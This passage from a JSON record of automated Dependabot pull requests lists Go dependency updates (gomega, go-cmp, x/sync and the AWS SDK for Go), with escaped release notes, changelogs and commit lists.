[6ca6e97]\u003c/li\u003e\n\u003cli\u003edoc: fix type on gleak go doc [f1b8343]\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/onsi/gomega/blob/master/CHANGELOG.md\"\u003egithub.com/onsi/gomega's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e1.31.1\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eInverted arguments order of FailureMessage of BeComparableToMatcher [e0dd999]\u003c/li\u003e\n\u003cli\u003eUpdate test in case keeping msg is desired [ad1a367]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eShow how to import the format sub package [24e958d]\u003c/li\u003e\n\u003cli\u003etidy up go.sum [26661b8]\u003c/li\u003e\n\u003cli\u003ebump dependencies [bde8f7a]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.31.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAsync assertions include context cancellation cause if present [121c37f]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump minimum go version [dee1e3c]\u003c/li\u003e\n\u003cli\u003edocs: fix typo in example usage \u0026quot;occured\u0026quot; -\u0026gt; \u0026quot;occurred\u0026quot; [49005fe]\u003c/li\u003e\n\u003cli\u003eBump actions/setup-go from 4 to 5 (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/714\"\u003e#714\u003c/a\u003e) [f1c8757]\u003c/li\u003e\n\u003cli\u003eBump github/codeql-action from 2 to 3 (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/715\"\u003e#715\u003c/a\u003e) [9836e76]\u003c/li\u003e\n\u003cli\u003eBump github.com/onsi/ginkgo/v2 from 2.13.0 to 2.13.2 (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/713\"\u003e#713\u003c/a\u003e) [54726f0]\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/net from 0.17.0 to 0.19.0 (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/711\"\u003e#711\u003c/a\u003e) [df97ecc]\u003c/li\u003e\n\u003cli\u003edocs: fix \u003ccode\u003eHaveExactElement\u003c/code\u003e typo (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/712\"\u003e#712\u003c/a\u003e) [a672c86]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.30.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBeTrueBecause and BeFalseBecause allow for better failure messages [4da4c7f]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump actions/checkout from 3 to 4 (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/694\"\u003e#694\u003c/a\u003e) [6ca6e97]\u003c/li\u003e\n\u003cli\u003edoc: fix type on gleak go doc [f1b8343]\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/762b171852113d80d8fc360558cccbccdc46af70\"\u003e\u003ccode\u003e762b171\u003c/code\u003e\u003c/a\u003e v1.31.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/26661b8d34c7d8205844de07a3ec5637a595bef6\"\u003e\u003ccode\u003e26661b8\u003c/code\u003e\u003c/a\u003e tidy up go.sum\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/bde8f7a2c07ccfc535b2d9082e7dcaa1fbca91c5\"\u003e\u003ccode\u003ebde8f7a\u003c/code\u003e\u003c/a\u003e bump dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/24e958d368b1e67070bded6ddd1a108d70698b14\"\u003e\u003ccode\u003e24e958d\u003c/code\u003e\u003c/a\u003e Show how to import the format sub package\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/ad1a367ab5b86a7abad96a75ac25f1383fa97e69\"\u003e\u003ccode\u003ead1a367\u003c/code\u003e\u003c/a\u003e Update test in case keeping msg is desired\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/e0dd999861372e3b7838b6719258eee5fd16276a\"\u003e\u003ccode\u003ee0dd999\u003c/code\u003e\u003c/a\u003e Inverted arguments order of FailureMessage of BeComparableToMatcher\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/ba8bba2272bbf185a144b2681b5ed1f72d7f04f7\"\u003e\u003ccode\u003eba8bba2\u003c/code\u003e\u003c/a\u003e v1.31.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/121c37f100b97f1d2c3f68c436f92bd7df4a120a\"\u003e\u003ccode\u003e121c37f\u003c/code\u003e\u003c/a\u003e Async assertions include context cancellation cause if present\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/dee1e3cc5e375dedf8360bf3d673a433ef04b948\"\u003e\u003ccode\u003edee1e3c\u003c/code\u003e\u003c/a\u003e Bump minimum go version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/49005fe1960542f223c64b1af4e7544d34746a01\"\u003e\u003ccode\u003e49005fe\u003c/code\u003e\u003c/a\u003e docs: fix typo in example usage \u0026quot;occured\u0026quot; -\u0026gt; \u0026quot;occurred\u0026quot;\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/onsi/gomega/compare/v1.29.0...v1.31.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/google/go-cmp` from 0.6.0 to 0.7.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/google/go-cmp/releases\"\u003egithub.com/google/go-cmp's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.7.0\u003c/h2\u003e\n\u003cp\u003eNew API:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e(\u003ca href=\"https://redirect.github.com/google/go-cmp/issues/367\"\u003e#367\u003c/a\u003e) Support compare functions with SortSlices and SortMaps\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003ePanic messaging:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e(\u003ca href=\"https://redirect.github.com/google/go-cmp/issues/370\"\u003e#370\u003c/a\u003e) Detect proto.Message types when failing to export a field\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/google/go-cmp/commit/9b12f366a942ebc7254abc7f32ca05068b455fb7\"\u003e\u003ccode\u003e9b12f36\u003c/code\u003e\u003c/a\u003e Detect proto.Message types when failing to export a field (\u003ca href=\"https://redirect.github.com/google/go-cmp/issues/370\"\u003e#370\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/google/go-cmp/commit/4dd3d63d6987c0f84fce8e1d1c5bb59f0badc220\"\u003e\u003ccode\u003e4dd3d63\u003c/code\u003e\u003c/a\u003e fix: type 'aribica' =\u0026gt; 'arabica' (\u003ca href=\"https://redirect.github.com/google/go-cmp/issues/368\"\u003e#368\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/google/go-cmp/commit/391980c4b2e1cc2c30d2bfae6039815350490495\"\u003e\u003ccode\u003e391980c\u003c/code\u003e\u003c/a\u003e Support compare functions with SortSlices and SortMaps (\u003ca href=\"https://redirect.github.com/google/go-cmp/issues/367\"\u003e#367\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/google/go-cmp/compare/v0.6.0...v0.7.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `golang.org/x/sync` from 0.6.0 to 0.20.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/sync/commit/ec11c4a93de22cde2abe2bf74d70791033c2464c\"\u003e\u003ccode\u003eec11c4a\u003c/code\u003e\u003c/a\u003e errgroup: fix a typo in the documentation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/sync/commit/1a583072c11b16c643c8f6051ff1fab5a424d0a9\"\u003e\u003ccode\u003e1a58307\u003c/code\u003e\u003c/a\u003e all: modernize interface{} -\u0026gt; any\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/sync/commit/3172ca581eb96530283f713311f81df986c19932\"\u003e\u003ccode\u003e3172ca5\u003c/code\u003e\u003c/a\u003e all: upgrade go directive to at least 1.25.0 [generated]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/sync/commit/2a180e22fddcc336475e72aa950be958c1b68d33\"\u003e\u003ccode\u003e2a180e2\u003c/code\u003e\u003c/a\u003e errgroup: use consistent read for SetLimit panic\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/sync/commit/1966f539bbd7664efd5bb7462ae94d9db67f4502\"\u003e\u003ccode\u003e1966f53\u003c/code\u003e\u003c/a\u003e errgroup: fix some typos in comment\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/sync/commit/04914c200cb38d4ea960ee6a4c314a028c632991\"\u003e\u003ccode\u003e04914c2\u003c/code\u003e\u003c/a\u003e all: upgrade go directive to at least 1.24.0 [generated]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/sync/commit/7fad2c9213e0821bd78435a9c106806f2fc383f1\"\u003e\u003ccode\u003e7fad2c9\u003c/code\u003e\u003c/a\u003e errgroup: revert propagation of panics\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/sync/commit/8a14946fb031f4bf6096242b5e6ae6f7316d47d8\"\u003e\u003ccode\u003e8a14946\u003c/code\u003e\u003c/a\u003e errgroup: remove duplicated comment\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/sync/commit/1869c690bf11da5dd230e188d03a612a4a3f8ba6\"\u003e\u003ccode\u003e1869c69\u003c/code\u003e\u003c/a\u003e all: replace deprecated ioutil\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/sync/commit/d1ac909e84c04f4326f620436b3894b3f5de0bd4\"\u003e\u003ccode\u003ed1ac909\u003c/code\u003e\u003c/a\u003e sync/errgroup: PanicError.Error print stack trace\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/golang/sync/compare/v0.6.0...v0.20.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\n\n\n\u003c/details\u003e","html_url":"https://github.com/omnius-labs/core-go/pull/6","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/omnius-labs%2Fcore-go/issues/6","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/6/packages"}},{"old_version":"1.55.7","new_version":"1.55.8","update_type":"patch","path":null,"pr_created_at":"2026-05-05T04:19:31.000Z","version_change":"1.55.7 → 1.55.8","issue":{"uuid":"4381486214","node_id":"PR_kwDOAOaWjc7YQqGB","number":124085,"state":"closed","title":"deps(go): bump the aws-sdk-go group across 1 directory with 14 updates","user":"dependabot[bot]","labels":["area/backend","no-changelog"],"assignees":[],"locked":false,"comments_count":6,"pull_request":true,"closed_at":"2026-05-11T08:09:39.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-05T04:19:31.000Z","updated_at":"2026-05-11T08:09:50.000Z","time_to_close":532208,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"deps(go): bump","group_name":"aws-sdk-go","update_count":14,"packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.7","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/aws/aws-sdk-go-v2","old_version":"1.41.6","new_version":"1.41.7","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/config","old_version":"1.32.15","new_version":"1.32.17","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/bedrockruntime","old_version":"1.50.5","new_version":"1.50.6","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/cloudwatch","old_version":"1.45.3","new_version":"1.57.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/cloudwatchlogs","old_version":"1.51.0","new_version":"1.73.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ec2","old_version":"1.296.0","new_version":"1.300.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/oam","old_version":"1.18.3","new_version":"1.23.17","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/resourcegroupstaggingapi","old_version":"1.26.6","new_version":"1.31.12","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/s3","old_version":"1.97.1","new_version":"1.100.1","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/secretsmanager","old_version":"1.40.1","new_version":"1.41.7","repository_url":"https://github.com/aws/aws-sdk-go-v2"}],"path":null,"ecosystem":"go"},"body":"Bumps the aws-sdk-go group with 11 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.55.7` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.41.6` | `1.41.7` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.32.15` | `1.32.17` |\n| [github.com/aws/aws-sdk-go-v2/service/bedrockruntime](https://github.com/aws/aws-sdk-go-v2) | `1.50.5` | `1.50.6` |\n| [github.com/aws/aws-sdk-go-v2/service/cloudwatch](https://github.com/aws/aws-sdk-go-v2) | `1.45.3` | `1.57.0` |\n| [github.com/aws/aws-sdk-go-v2/service/cloudwatchlogs](https://github.com/aws/aws-sdk-go-v2) | `1.51.0` | `1.73.0` |\n| [github.com/aws/aws-sdk-go-v2/service/ec2](https://github.com/aws/aws-sdk-go-v2) | `1.296.0` | `1.300.0` |\n| [github.com/aws/aws-sdk-go-v2/service/oam](https://github.com/aws/aws-sdk-go-v2) | `1.18.3` | `1.23.17` |\n| [github.com/aws/aws-sdk-go-v2/service/resourcegroupstaggingapi](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.31.12` |\n| [github.com/aws/aws-sdk-go-v2/service/s3](https://github.com/aws/aws-sdk-go-v2) | `1.97.1` | `1.100.1` |\n| [github.com/aws/aws-sdk-go-v2/service/secretsmanager](https://github.com/aws/aws-sdk-go-v2) | `1.40.1` | `1.41.7` |\n\n\nUpdates `github.com/aws/aws-sdk-go` from 1.55.7 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.7...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2` from 1.41.6 to 1.41.7\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.41.6...v1.41.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/config` from 1.32.15 to 1.32.17\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.32.15...config/v1.32.17\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/credentials` from 1.19.14 to 1.19.16\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca 